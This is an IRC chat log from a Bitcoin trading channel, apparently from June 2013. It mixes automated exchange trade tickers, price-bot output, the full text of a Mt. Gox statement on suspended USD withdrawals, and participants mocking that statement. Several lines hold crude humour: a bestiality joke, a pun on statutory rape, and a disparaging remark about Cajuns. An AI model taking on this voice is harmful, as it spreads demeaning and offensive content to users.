involved in that pooling is being made more ciomplex and more expensive Jun 21 16:09:43 by an identifiable source. Jun 21 16:10:08 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [+] Jun 21 16:11:27 i don't think so, because i don't think they're having issues servicing mtgox, i think their issues are more likely related to getting pressured from lots of different sides Jun 21 16:12:02 ... Jun 21 16:12:11 listen, suppose i have a pipe to your house. Jun 21 16:12:17 normally i send oil. ocasionally i send farts. Jun 21 16:12:32 do you suppose soon enouigh we'd have a deal whereby it's ok to send farts, but i have to notify you when i do ? Jun 21 16:12:37 natural gas Jun 21 16:12:40 right. Jun 21 16:13:28 depends on how i feel about farts i guess Jun 21 16:13:41 i'd rather have the oil tho Jun 21 16:13:41 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Jun 21 16:13:48 right. Jun 21 16:15:51 mtgox flows being classified as farts by correspondents is what i mean by "getting pressured from lots of different sides" Jun 21 16:16:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.031 = 0.62 BTC [-] Jun 21 16:18:31 but you're thinking backwards. Jun 21 16:18:45 only when moonwalking Jun 21 16:18:52 see, if you take a credit and then receive a letter from the bank saying you are late on repayment Jun 21 16:18:58 you are NOT being pressured by the bank. Jun 21 16:19:06 it's what you said you were gonna fucking do yourself! Jun 21 16:19:14 yes, absolutely Jun 21 16:19:17 rigjht. same thing. Jun 21 16:19:32 (i spare you the spelling backwards for the sake of both our mental sanity) Jun 21 16:19:37 lmao Jun 21 16:21:56 [BTCTC] [BASIC-MINING] 1 @ 1.199999 BTC [+] Jun 21 16:21:58 [BTCTC] [BASIC-MINING] 2 @ 1.2 = 2.4 BTC [+] Jun 21 16:23:05 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Jun 21 16:23:51 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Jun 21 16:23:53 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [+] Jun 21 16:23:54 lol at gox support https://bitcointalk.org/index.php?topic=239434.msg2539468#msg2539468 Jun 21 16:23:54 [BTCTC] [ASICMINER-PT] 16 @ 3 = 48 BTC [+] Jun 21 16:24:05 engrish Jun 21 16:28:27 the client that wanted email signup in their email newsletter "what I read from newsletter marketing is to accommodate those who are forwarded the newsletter and then want to sign up. So, I thought it was a great idea as people do talk about our e-newsletter and we encourage them to pass it along." Jun 21 16:28:37 "High-Grade Structured Credit Strategies Enhanced Leverage Master Fund" possibly the best name ever. Jun 21 16:28:58 they wanna improve their mktg and this is what the y prioritize... Jun 21 16:29:15 god forbid someone forwarded the email mnight actually visit the website Jun 21 16:29:26 ThickAsThieves dude can you implement a signup form in my buysiness card ? Jun 21 16:29:39 i really was wondering if she'd ask that Jun 21 16:30:12 this is also like how people insist on having this on their business card: Jun 21 16:30:18 me@me.com Jun 21 16:30:19 me.com Jun 21 16:30:31 their reasoning Jun 21 16:30:42 people won't know me.com is my website from my email address Jun 21 16:31:10 of course the website already also appears elsewhere too Jun 21 16:31:21 at one point i was having simple Mircea Popescu business cards Jun 21 16:31:28 just to pisso ff people Jun 21 16:31:36 i've done that for people Jun 21 16:31:48 this guy that owned a bunch of Arby's Jun 21 16:32:07 it works if your name isn't common Jun 21 16:32:12 and if they protested i'd be all "but you know google, right ?" Jun 21 16:32:22 he ended up in jail for statutory rape Jun 21 16:32:29 wait what! Jun 21 16:32:44 no related Jun 21 16:32:46 but true Jun 21 16:32:53 [HAVELOCK] [HIM] 2 @ 0.279 = 0.558 BTC [-] Jun 21 16:33:04 lol k Jun 21 16:33:06 he owes me like $3400 too Jun 21 16:33:08 which statue did he rape ? Jun 21 16:33:09 lol Jun 21 16:33:27 roonald macdonald obv Jun 21 16:33:45 [HAVELOCK] [SDICE] 1 @ 0.216989 BTC [-] Jun 21 16:34:21 he always bleached his teeth to often to he was always making this weird skelton face from the pain Jun 21 16:34:27 too* Jun 21 16:34:52 i think he was from Louisiana Jun 21 16:34:57 cajuns... Jun 21 16:35:12 [BTCTC] [TAT.ASICMINER] 42 @ 0.02972 = 1.2482 BTC [-] Jun 21 16:35:18 [HAVELOCK] [ASICM] 2 @ 0.03 = 0.06 BTC [+] Jun 21 16:35:27 [BTCTC] [DMS.MINING] 74 @ 0.018 = 1.332 BTC [+] Jun 21 16:35:32 ThickAsThieves: degenerated genes Jun 21 16:35:34 [HAVELOCK] [ASICM] 2 @ 0.03 = 0.06 BTC [+] Jun 21 16:37:01 [BTCTC] [TAT.ASICMINER] 58 @ 0.02972 = 1.7238 BTC [-] Jun 21 16:37:14 [BTCTC] [TAT.ASICMINER] 32 @ 0.02972 = 0.951 BTC [-] Jun 21 16:37:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.02972 = 0.2972 BTC [-] Jun 21 16:38:00 [BTCTC] [RSM] 7 @ 0.022987 = 0.1609 BTC [-] Jun 21 16:38:02 [BTCTC] [RSM] 1 @ 0.022988 BTC [+] Jun 21 16:38:04 [BTCTC] [RSM] 4 @ 0.023 = 0.092 BTC [+] Jun 21 16:38:38 [BTCTC] [RSM] 1 @ 0.023 BTC [+] Jun 21 16:38:39 heh Jun 21 16:39:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.0307 = 0.614 BTC [+] Jun 21 16:39:48 [HAVELOCK] [ASICM] 1 @ 0.02999999 BTC [-] Jun 21 16:40:41 [BTCTC] [BASIC-MINING] 1 @ 1.249989 BTC [+] Jun 21 16:40:42 [BTCTC] [BASIC-MINING] 5 @ 1.249989 = 6.2499 BTC [+] Jun 21 16:40:45 [BTCTC] [BASIC-MINING] 1 @ 1.25 BTC [+] Jun 21 16:40:47 [BTCTC] [BASIC-MINING] 2 @ 1.3 = 2.6 BTC [+] Jun 21 16:41:05 [HAVELOCK] [ASICM] 3 @ 0.02999999 = 0.09 BTC [-] Jun 21 16:41:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.0307 = 0.0921 BTC [+] Jun 21 16:42:10 [BTCTC] [TAT.ASICMINER] 86 @ 0.03 = 2.58 BTC [-] Jun 21 16:42:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0307 = 0.307 BTC [+] Jun 21 16:42:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.0307 = 1.535 BTC [+] Jun 21 16:42:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.0307 = 0.307 BTC [+] Jun 21 16:43:24 [BTCTC] [ASICMINER-PT] 1 @ 3.077 BTC [+] Jun 21 16:44:55 https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/1005400_10151702698639090_662035276_n.jpg Jun 21 16:45:06 - see honey? Jun 21 16:45:26 - here's the cow i fuck when you have your headaches Jun 21 16:45:41 - you fucking idiot it's not a cow, it's a chicken Jun 21 16:45:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199995 BTC [-] Jun 21 16:45:49 - i wasn't talking to you Jun 21 16:46:54 terrible Jun 21 16:46:57 lmao Jun 21 16:47:31 ...well on fridays we have chicken sex jokes Jun 21 16:47:43 [BTCTC] [TAT.ASICMINER] 7 @ 0.0307 = 0.2149 BTC [+] Jun 21 16:47:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.0307 = 0.0921 BTC [+] Jun 21 16:47:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.03002 = 0.2101 BTC [-] Jun 21 16:48:48 [MPEX] [S.MPOE] 9200 @ 0.00077956 = 7.172 BTC [+] Jun 21 16:48:51 ;;nethash Jun 21 16:49:12 ;;;gribble Jun 21 16:49:20 .d Jun 21 16:49:36 19339258.27239 | Next Diff in 1335 blocks | Estimated Change: 1.1902% in 9d 3h 45m 12s Jun 21 16:49:44 [BTCTC] [RSM] 6 @ 0.023 = 0.138 BTC [+] Jun 21 16:50:28 [BTCTC] [RSM] 6 @ 0.023551 = 0.1413 BTC [+] Jun 21 16:50:30 [HAVELOCK] [ASICM] 7 @ 0.0296005 = 0.2072 BTC [-] Jun 21 16:50:32 [HAVELOCK] [ASICM] 71 @ 0.0296 = 2.1016 BTC [-] Jun 21 16:50:33 [HAVELOCK] [ASICM] 37 @ 0.0296 = 1.0952 BTC [-] Jun 21 16:50:33 <[\\\]> we haz no gribble Jun 21 16:50:34 [HAVELOCK] [ASICM] 1 @ 0.02956 BTC [-] Jun 21 16:50:35 [HAVELOCK] [ASICM] 1 @ 0.02955 BTC [-] Jun 21 16:50:36 [HAVELOCK] [ASICM] 60 @ 0.029001 = 1.7401 BTC [-] Jun 21 16:50:37 [HAVELOCK] [ASICM] 173 @ 0.029 = 5.017 BTC [-] Jun 21 16:50:37 <[\\\]> gribble on vaca Jun 21 16:50:48 140162.098373 Jun 21 16:51:08 [HAVELOCK] [ASICM] 4 @ 0.02999997 = 0.12 BTC [+] Jun 21 16:51:30 [HAVELOCK] [HIM] 2 @ 0.293999 = 0.588 BTC [+] Jun 21 16:51:32 .bait Jun 21 16:51:33 http://25.media.tumblr.com/3ddf93d7b99dde5792647c1e504414e3/tumblr_mgnjpvUXsT1qh0h7go1_500.jpg Jun 21 16:53:15 ThickAsThieves: you had me at "http" Jun 21 16:53:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.03079 = 0.2155 BTC [+] Jun 21 16:54:46 nice tit. Jun 21 16:55:26 [HAVELOCK] [ASICM] 5 @ 0.02999897 = 0.15 BTC [-] Jun 21 16:55:28 [BTCTC] [S.MPOE-PT] 97 @ 0.00078 = 0.0757 BTC [+] Jun 21 16:55:35 [BTCTC] [S.MPOE-PT] 1000 @ 0.00078 = 0.78 BTC [+] Jun 21 16:55:42 i can join ozbot if you like Jun 21 16:55:50 not sure who's in charge here Jun 21 16:56:10 no one is, but kakobrekla is Jun 21 16:56:16 [HAVELOCK] [ASICM] 16 @ 0.02999897 = 0.48 BTC [-] Jun 21 16:56:35 [BTCTC] [S.MPOE-PT] 20 @ 0.000787 = 0.0157 BTC [+] Jun 21 16:56:40 [BTCTC] [S.MPOE-PT] 130 @ 0.000787 = 0.1023 BTC [+] Jun 21 16:56:41 [BTCTC] [TAT.ASICMINER] 16 @ 0.0308 = 0.4928 BTC [+] Jun 21 16:57:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.0308 = 0.1232 BTC [+] Jun 21 16:57:00 Jezzz i imagine it'll be fine if its not spammy Jun 21 16:57:26 i think ozbot can only be instigated Jun 21 16:57:33 nothing automatic Jun 21 16:58:07 joining AssetBot however, would get us all the Bitfunder tickers Jun 21 16:58:11 [BTCTC] [GSDPT] 7 @ 0.002586 = 0.0181 BTC [-] Jun 21 16:58:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03079 BTC [-] Jun 21 16:58:28 "In the last 20 years, I can count on one hand all the times I've been accused of wrongdoing (all unjustified, with the exception of one, for at night, all goats look the same, and I swore he was one of mine). " Jun 21 16:58:32 bwahaha Jun 21 16:58:53 read that too, lold hard Jun 21 16:59:14 ThickAsThieves: i believe assetbot was already shot down here Jun 21 16:59:36 but yeah, ozbot is quiet unless instigated :) Jun 21 16:59:40 oh ass in assbot means asset Jun 21 16:59:46 mwahaha Jun 21 16:59:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.03089 = 0.1545 BTC [+] Jun 21 16:59:51 [BTCTC] [TAT.ASICMINER] 45 @ 0.03089 = 1.3901 BTC [+] Jun 21 17:02:47 what if you just put assetbot in, then we all fall in love with it, then kako boots it, then we all yell at kako, then he gives in? Jun 21 17:02:52 sounds like a plan, no? Jun 21 17:03:26 [HAVELOCK] [VTX] 2 @ 0.449999 = 0.9 BTC [+] Jun 21 17:04:02 pankkake: yeah, most porn is posted by mircea_popescu here, not by assbot Jun 21 17:04:27 ThickAsThieves: lol Jun 21 17:04:35 it's not porn, it's lub. Jun 21 17:04:52 i'll fire up ozbot and will just kill if if whoever is in charge says no Jun 21 17:10:18 i think bait might be appreciated here also Jun 21 17:10:34 i like bait Jun 21 17:10:52 [BTCTC] [ASICMINER-PT] 1 @ 3.014 BTC [-] Jun 21 17:12:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.03089 BTC [+] Jun 21 17:14:27 [BTCTC] [BASIC-MINING] 1 @ 1.275001 BTC [-] Jun 21 17:14:38 [BTCTC] [BASIC-MINING] 1 @ 1.3 BTC [+] Jun 21 17:14:45 [BTCTC] [TAT.ASICMINER] 24 @ 0.03089 = 0.7414 BTC [+] Jun 21 17:14:47 [BTCTC] [RSM] 10 @ 0.021001 = 0.21 BTC [-] Jun 21 17:15:24 [HAVELOCK] [ASICM] 1 @ 0.0299901 BTC [-] Jun 21 17:15:26 [BTCTC] [BASIC-MINING] 1 @ 1.300001 BTC [+] Jun 21 17:16:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.030028 = 1.5014 BTC [-] Jun 21 17:16:33 [BTCTC] [TAT.ASICMINER] 50 @ 0.030027 = 1.5014 BTC [-] Jun 21 17:16:36 [BTCTC] [TAT.ASICMINER] 50 @ 0.030025 = 1.5013 BTC [-] Jun 21 17:16:42 [BTCTC] [TAT.ASICMINER] 214 @ 0.03 = 6.42 BTC [-] Jun 21 17:17:55 [HAVELOCK] [HIM] 1 @ 0.293999 BTC [+] Jun 21 17:18:40 [HAVELOCK] [ASICM] 16 @ 0.0299891 = 0.4798 BTC [-] Jun 21 17:18:41 [HAVELOCK] [ASICM] 149 @ 0.0299901 = 4.4685 BTC [+] Jun 21 17:19:49 [BTCTC] [RSM] 91 @ 0.023551 = 2.1431 BTC [+] Jun 21 17:19:50 [BTCTC] [RSM] 1 @ 0.02375 BTC [+] Jun 21 17:19:58 [BTCTC] [RSM] 2 @ 0.02399 = 0.048 BTC [+] Jun 21 17:20:00 [BTCTC] [RSM] 59 @ 0.028999 = 1.7109 BTC [+] Jun 21 17:20:02 [BTCTC] [RSM] 40 @ 0.029 = 1.16 BTC [+] Jun 21 17:20:53 [BTCTC] [DMS.MINING] 1 @ 0.017897 BTC [-] Jun 21 17:20:55 [BTCTC] [DMS.MINING] 10 @ 0.0179 = 0.179 BTC [+] Jun 21 17:20:56 [BTCTC] [DMS.MINING] 22 @ 0.018 = 0.396 BTC [+] Jun 21 17:20:57 [BTCTC] [DMS.MINING] 20 @ 0.0181 = 0.362 BTC [+] Jun 21 17:20:58 [BTCTC] [DMS.MINING] 119 @ 0.01839 = 2.1884 BTC [+] Jun 21 17:21:27 [BTCTC] [TAT.ASICMINER] 12 @ 0.03085 = 0.3702 BTC [+] Jun 21 17:21:28 gox unleases a wall of text on facebook Jun 21 17:21:38 please forgive me for incoming wall Jun 21 17:21:46 Dear Mt. Gox Customers and Bitcoiners, Jun 21 17:21:46 The reaction since yesterday’s statement regarding the temporary suspension of U.S. dollar withdrawals has had mixed reactions, and raised more than a few questions about why we had to take this step right now. Rather than be subject to inaccurate speculation we’d like to clarify some points here. Due to pending matters we are unable to get into everything in great detail, though Jun 21 17:21:47 we’d certainly love to and are looking forward to the opportunity. Jun 21 17:21:50 1) The problem with the U.S. withdrawals (and even other currencies for that matter) is that our bank can no longer handle the volume of withdrawals. They struggled in the last two months, and the increase due to the Dwolla separation has made it increasingly more difficult. The pressure we brought onto the bank’s resources finally gave in, and we are now working with them to find an Jun 21 17:21:50 alternative method (hence the suspension). We would have preferred to give notice if we were able to, but it was sudden for us as well. Jun 21 17:21:59 2) We are now working with new banks and alternative methods for transmitting money to our customers. This does not mean we are stopping entirely within the next two weeks, but it will be slower than we would like. We are literally going to use our manpower to process withdrawals ourselves, manually. This will take more time, but we are dedicated to doing as many per day as possible. Jun 21 17:21:59 We announced a suspension in order to manage expectations while we deliver at a temporary reduced rate. Our goal is to have a new system set up in the next weeks with clarity for both the banks and for our customers. Jun 21 17:22:10 3) Our previous release was rather vague, but for a reason. Mainly, we don't want to upset our bank! They do great work, but our kind of business is completely new to the banking industry. Processing international wires does not just involve pushing a button. It requires real manpower processing everything individually, even in this modern computer age. While Bitcoin's power lies in Jun 21 17:22:11 its ability to transfer fast and securely through software, the rest of the financial world does not operate like that (contrary to popular opinion). Money is surprisingly analog in many ways, and scarily digital in others. Jun 21 17:22:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.030849 BTC [-] Jun 21 17:22:23 4) Every customer’s funds are safe, sound, and accounted for. In fact, in our dealings with the Japanese financial regulators we have been assured that we are not under local pressure or suspicion and can operate as usual within normal legal frameworks. Jun 21 17:22:34 5) Mt. Gox is certainly not a martyr, but it would be hard to argue that we aren’t "taking one for the team" as far as Bitcoin is concerned. We are a big target, and are absorbing the frustrations of Bitcoiners, regulators, banks, and a media that still doesn't quite understand what Bitcoin is. This is a job we are happy to fill, and not just because we are compensated for it. Our Jun 21 17:22:34 hope is that, once Bitcoin finds its place, we will be able to say that we made a difference in sorting it all out in the early days. New exchanges, business models, merchants, traders, and consumers are rising up to innovate and create a whole new way of doing business. A lot of lawyers are getting new cars in the meantime too. Jun 21 17:22:45 6) As risky as it is to invoke the name of Litecoin (LTC???), we must apologize for not keeping everyone up to date. The fact is that the current situation means a continued delay, but for good reasons. We’re looking at July right now, though that depends on a few things. Mainly, we want to do things correctly from the beginning. Jun 21 17:22:51 7) The new trading engine is finished, is smokin’ fast, and is currently undergoing bench tests. We’re looking forward to deploying it very soon. Jun 21 17:22:59 While not the most in-depth update we'd like to give, we hope that it has at least clarified a few things. In the next few weeks we are planning to do another AMA on Reddit when we’ll hopefully be able to answer many more questions and also shed some light on what’s been going on at Mt. Gox these past months. Thank you for your patience and support. Jun 21 17:23:02 end Jun 21 17:23:40 .r Jun 21 17:23:43 Gox | Buy: $109.26 Sell: $109.98 Last: $109.26 High: $115.01 Low: $107.62 Jun 21 17:23:43 Weex | API Error Jun 21 17:23:45 .d Jun 21 17:23:45 19339258.27239 | Next Diff in 1334 blocks | Estimated Change: 1.0268% in 9d 3h 43m 36s Jun 21 17:23:47 .n Jun 21 17:23:48 140162.098373 Jun 21 17:23:49 etc Jun 21 17:25:06 what Jun 21 17:25:15 where is gribble Jun 21 17:25:30 dunno. wasn't my turn to watch him. Jun 21 17:26:12 the TLDR of the Gox post = We are victims of our own success, you're welcome. Litecoin coming in July, maybe. Jun 21 17:26:17 cue ltc rally! Jun 21 17:26:49 ltc rally already started Jun 21 17:27:03 .lr Jun 21 17:27:05 BTC-e | Buy: $2.64 Sell: $2.62 Last: $2.62 High: $2.65 Low: $2.15 Jun 21 17:27:14 up 35% Jun 21 17:27:35 sorry Jun 21 17:27:38 15% Jun 21 17:27:41 :/ Jun 21 17:27:56 just give it a minute Jun 21 17:27:57 :) Jun 21 17:28:10 [BTCTC] [BITVPS] 49 @ 0.001583 = 0.0776 BTC [-] Jun 21 17:28:12 [BTCTC] [BITVPS] 100 @ 0.0014 = 0.14 BTC [-] Jun 21 17:28:13 [BTCTC] [BITVPS] 100 @ 0.0013 = 0.13 BTC [-] Jun 21 17:28:48 [BTCTC] [COG.F] 1 @ 3.74995 BTC [+] Jun 21 17:28:54 [BTCTC] [COG.F] 1 @ 3.74996 BTC [+] Jun 21 17:29:12 [HAVELOCK] [ASICM] 165 @ 0.02999999 = 4.95 BTC [+] Jun 21 17:30:26 [MPEX] [S.MPOE] 3000 @ 0.00077521 = 2.3256 BTC [-] Jun 21 17:32:21 ThickAsThieves that was uniquely retarded. Jun 21 17:32:47 "japan's 2nd largest back was struggling with our volume. they handle paychecks for all of japan fine" Jun 21 17:33:25 "this has been going on for months. while we'd have loved to follow mp's example and give notice of events ahead of time (such as for isntance http://trilema.com/2013/in-the-interest-of-full-disclosure-failed-social-engineering-attempt-and-0day-vulnerability-in-betadesk/ ), it was sudden for us as well." Jun 21 17:33:36 well that's why it's such a surprise to everyone Jun 21 17:33:41 totally. Jun 21 17:33:59 oddly enough they didn't say the two weeks (tm) Jun 21 17:34:06 I doubt that wire transfers go through an API Jun 21 17:34:11 they did tho Jun 21 17:34:11 im not sure you're allowed to be a bitcoin scam w/o that. Jun 21 17:34:15 a they did ? Jun 21 17:34:17 they just cant actually say it Jun 21 17:34:24 they said litecoin in july maybe Jun 21 17:34:29 ip issues huh Jun 21 17:34:29 2 weeks away! Jun 21 17:34:32 [BTCTC] [CRYPTO-TRADE] 9 @ 0.199995 = 1.8 BTC [-] Jun 21 17:34:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.030788 = 0.7697 BTC [-] Jun 21 17:34:50 "Every customer’s funds are safe, sound, and consensual" Jun 21 17:34:55 and they already said USD suspended for 2 weeks Jun 21 17:35:03 this really is kinda amazine Jun 21 17:35:11 this whole 2 weeks phenom Jun 21 17:35:36 just 2 weeks yo Jun 21 17:35:44 [BTCTC] [S.MPOE-PT] 1 @ 0.00078 BTC [-] Jun 21 17:35:46 bitcoin business are amazing things in general Jun 21 17:36:03 ThickAsThieves it is the future horizon of bitcoin management as a collective. Jun 21 17:36:09 it's kind alike bitcoin's "the check is in the mail" Jun 21 17:36:10 which is why everyone seems 15. Jun 21 17:36:24 [BTCTC] [S.MPOE-PT] 11 @ 0.00078 = 0.0086 BTC [-] Jun 21 17:37:29 maybe i'll make shirts that say 2 Weeks, Bro Jun 21 17:38:00 i'll buy it Jun 21 17:38:11 get with imsaguy on Coming Soon! (trademark) Jun 21 17:41:39 [HAVELOCK] [ASICM] 44 @ 0.02999999 = 1.32 BTC [+] Jun 21 17:42:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.0306 = 0.2754 BTC [-] Jun 21 17:45:59 foiled by BTCT manual withdrawals once again :( Jun 21 17:46:59 [BTCTC] [BASIC-MINING] 1 @ 1.324999 BTC [+] Jun 21 17:47:10 [BTCTC] [RSM] 1 @ 0.025001 BTC [-] Jun 21 17:48:44 [BTCTC] [RSM] 10 @ 0.0294 = 0.294 BTC [+] Jun 21 17:49:30 [BTCTC] [ASICMINER-PT] 1 @ 3.0629 BTC [+] Jun 21 17:49:56 “Americans remind us for cutting short the propaganda of sodomy among minors and at the same time they stick their noses into personal correspondence of tens of millions of citizens”, Zheleznyak said. Jun 21 17:50:00 teh duma is not impressed. Jun 21 17:51:14 [BTCTC] [ASICMINER-PT] 1 @ 3.063 BTC [+] Jun 21 17:51:40 [BTCTC] [S.MPOE-PT] 28 @ 0.00077 = 0.0216 BTC [-] Jun 21 17:52:20 [BTCTC] [ASICMINER-PT] 1 @ 3.063 BTC [+] Jun 21 17:53:57 [BTCTC] [TAT.ASICMINER] 44 @ 0.030349 = 1.3354 BTC [-] Jun 21 17:54:41 [BTCTC] [DMS.PURCHASE] 16 @ 0.054412 = 0.8706 BTC [+] Jun 21 17:55:25 [BTCTC] [RSM] 100 @ 0.025 = 2.5 BTC [-] Jun 21 17:55:27 [BTCTC] [RSM] 99 @ 0.024 = 2.376 BTC [-] Jun 21 17:58:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005594 BTC [+] Jun 21 17:59:30 [MPEX] [S.MPOE] 4700 @ 0.00077732 = 3.6534 BTC [+] Jun 21 17:59:43 [BTCTC] [GSDPT] 2 @ 0.002586 = 0.0052 BTC [-] Jun 21 18:01:22 [BTCTC] [ASICMINER-PT] 1 @ 3.059 BTC [-] Jun 21 18:01:24 [BTCTC] [S.BBET-PT] 13 @ 0.0019 = 0.0247 BTC [+] Jun 21 18:07:04 [BTCTC] [BASIC-MINING] 1 @ 1.299001 BTC [-] Jun 21 18:07:18 [BTCTC] [BASIC-MINING] 1 @ 1.299 BTC [-] Jun 21 18:07:36 [BTCTC] [BASIC-MINING] 1 @ 1.298 BTC [-] Jun 21 18:07:56 [BTCTC] [BASIC-MINING] 1 @ 1.297 BTC [-] Jun 21 18:08:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.030546 BTC [+] Jun 21 18:08:11 [BTCTC] [BASIC-MINING] 1 @ 1.296001 BTC [-] Jun 21 18:10:05 [BTCTC] [TAT.ASICMINER] 63 @ 0.030549 = 1.9246 BTC [+] Jun 21 18:10:42 [BTCTC] [ASICMINER-PT] 1 @ 3.057 BTC [-] Jun 21 18:10:45 [BTCTC] [ASICMINER-PT] 9 @ 3.058 = 27.522 BTC [+] Jun 21 18:10:46 [BTCTC] [S.MPOE-PT] 200 @ 0.00078 = 0.156 BTC [+] Jun 21 18:11:33 [BTCTC] [TAT.ASICMINER] 36 @ 0.0306 = 1.1016 BTC [+] Jun 21 18:11:35 [BTCTC] [TAT.ASICMINER] 66 @ 0.0306 = 2.0196 BTC [+] Jun 21 18:11:57 [HAVELOCK] [ASICM] 4 @ 0.02999997 = 0.12 BTC [-] Jun 21 18:11:59 [HAVELOCK] [ASICM] 9 @ 0.02999998 = 0.27 BTC [+] Jun 21 18:12:00 [HAVELOCK] [ASICM] 176 @ 0.02999999 = 5.28 BTC [+] Jun 21 18:12:31 [BTCTC] [ASICMINER-PT] 1 @ 3.059 BTC [+] Jun 21 18:13:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0056 BTC [+] Jun 21 18:13:06 [BTCTC] [COGNITIVE] 6 @ 0.285319 = 1.7119 BTC [-] Jun 21 18:13:26 [BTCTC] [COGNITIVE] 1 @ 0.28532 BTC [+] Jun 21 18:13:37 [BTCTC] [ASICMINER-PT] 3 @ 3.061 = 9.183 BTC [+] Jun 21 18:13:37 [BTCTC] [COGNITIVE] 1 @ 0.285328 BTC [+] Jun 21 18:13:39 [BTCTC] [ASICMINER-PT] 1 @ 3.063 BTC [+] Jun 21 18:13:40 [BTCTC] [COGNITIVE] 1 @ 0.28534 BTC [+] Jun 21 18:13:41 [BTCTC] [COGNITIVE] 4 @ 0.2855 = 1.142 BTC [+] Jun 21 18:13:42 [BTCTC] [ASICMINER-PT] 3 @ 3.065 = 9.195 BTC [+] Jun 21 18:13:49 [BTCTC] [ASICMINER-PT] 3 @ 3.067 = 9.201 BTC [+] Jun 21 18:13:51 [BTCTC] [COGNITIVE] 13 @ 0.288 = 3.744 BTC [+] Jun 21 18:13:53 [MPEX] [S.MPOE] 9050 @ 0.00077732 = 7.0347 BTC [+] Jun 21 18:13:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.03099 = 1.5495 BTC [+] Jun 21 18:13:57 [BTCTC] [COGNITIVE] 11 @ 0.2888 = 3.1768 BTC [+] Jun 21 18:14:27 [BTCTC] [TAT.VIRTUALMINE] 499 @ 0.0056 = 2.7944 BTC [+] Jun 21 18:15:26 [BTCTC] [TAT.ASICMINER] 29 @ 0.031 = 0.899 BTC [+] Jun 21 18:16:05 [BTCTC] [ASICMINER-PT] 1 @ 3.071 BTC [+] Jun 21 18:17:04 [BTCTC] [ASICMINER-PT] 1 @ 3.071 BTC [+] Jun 21 18:18:20 [HAVELOCK] [ASICM] 824 @ 0.02999999 = 24.72 BTC [+] Jun 21 18:18:26 [HAVELOCK] [ASICM] 30 @ 0.03 = 0.9 BTC [+] Jun 21 18:18:30 [HAVELOCK] [ASICM] 235 @ 0.03 = 7.05 BTC [+] Jun 21 18:18:35 [BTCTC] [ASICMINER-PT] 1 @ 3.0719 BTC [+] Jun 21 18:18:36 [HAVELOCK] [ASICM] 104 @ 0.03 = 3.12 BTC [+] Jun 21 18:18:39 [HAVELOCK] [ASICM] 2 @ 0.03 = 0.06 BTC [+] Jun 21 18:18:54 [BTCTC] [TAT.ASICMINER] 35 @ 0.031 = 1.085 BTC [+] Jun 21 18:19:43 [HAVELOCK] [ASICM] 77 @ 0.03037 = 2.3385 BTC [+] Jun 21 18:20:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [+] Jun 21 18:23:08 [BTCTC] [PAJKA.BOND] 1 @ 0.04947 BTC [+] Jun 21 18:23:35 [BTCTC] [ASICMINER-PT] 1 @ 3.073 BTC [+] Jun 21 18:24:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.031 = 0.093 BTC [+] Jun 21 18:24:55 [BTCTC] [TAT.ASICMINER] 13 @ 0.031 = 0.403 BTC [+] Jun 21 18:26:01 [BTCTC] [S.MPOE-PT] 100 @ 0.00077 = 0.077 BTC [-] Jun 21 18:26:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.031 = 0.186 BTC [+] Jun 21 18:26:33 [BTCTC] [S.MPOE-PT] 193 @ 0.00078 = 0.1505 BTC [+] Jun 21 18:26:51 [BTCTC] [TAT.ASICMINER] 26 @ 0.031 = 0.806 BTC [+] Jun 21 18:27:04 [BTCTC] [S.MPOE-PT] 8 @ 0.00077 = 0.0062 BTC [-] Jun 21 18:27:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0319 BTC [+] Jun 21 18:27:58 [BTCTC] [DMS.MINING] 18 @ 0.018398 = 0.3312 BTC [+] Jun 21 18:28:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.031001 = 1.5501 BTC [-] Jun 21 18:28:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0058 BTC [+] Jun 21 18:28:56 [BTCTC] [TAT.ASICMINER] 39 @ 0.031 = 1.209 BTC [-] Jun 21 18:28:57 [BTCTC] [S.MPOE-PT] 300 @ 0.000768 = 0.2304 BTC [-] Jun 21 18:28:58 [BTCTC] [S.MPOE-PT] 9 @ 0.000768 = 0.0069 BTC [-] Jun 21 18:29:59 [BTCTC] [COGNITIVE] 1 @ 0.271001 BTC [-] Jun 21 18:30:12 [BTCTC] [COGNITIVE] 1 @ 0.271 BTC [-] Jun 21 18:30:15 [BTCTC] [COGNITIVE] 5 @ 0.27 = 1.35 BTC [-] Jun 21 18:30:17 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [-] Jun 21 18:30:18 [BTCTC] [COGNITIVE] 2 @ 0.251 = 0.502 BTC [-] Jun 21 18:30:20 [BTCTC] [COGNITIVE] 1 @ 0.250004 BTC [-] Jun 21 18:30:21 [BTCTC] [COGNITIVE] 1 @ 0.250002 BTC [-] Jun 21 18:30:26 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] Jun 21 18:30:30 